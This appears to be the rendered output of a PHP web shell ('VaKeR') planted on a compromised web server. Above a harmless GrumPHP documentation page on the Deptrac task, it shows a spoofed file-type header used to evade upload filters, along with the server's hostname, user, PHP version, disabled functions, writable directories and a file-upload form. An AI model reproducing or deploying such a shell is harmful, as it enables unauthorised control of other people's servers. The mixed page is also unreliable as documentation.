%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/admin1/vendor/phpro/grumphp/doc/tasks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/admin1/vendor/phpro/grumphp/doc/tasks/deptrac.md
# Deptrac

Follow the [installation instructions](https://qossmic.github.io/deptrac/#installation) to add deptrac to your 
project.

The Deptrac task will check for dependencies between the software layers of your project. It lives under the `deptrac` 
namespace and has following configurable parameters:


```yaml
# grumphp.yml
grumphp:
    tasks:
        deptrac:
            cache_file: ~
            depfile: ~
            formatter: ~
            output: ~
```

**cache_file**

*Default: null*

Set location where cache file will be stored. Example: `/var/www/src/.deptrac.cache`

**depfile**

*Default: null*

Set path to deptrac configuration file. Example: `/var/www/src/deptrac.yaml`

**formatter**

*Default: null*

Enable formatter with this option, e.g. `console`, `github-actions`, `graphviz-display`, `graphviz-image`, `graphviz-dot`, `graphviz-html`, `junit`, `table`, `xml`, `baseline`, `json`.

**output**

*Default: null*

Set output file path for formatter (if applicable).

VaKeR 2022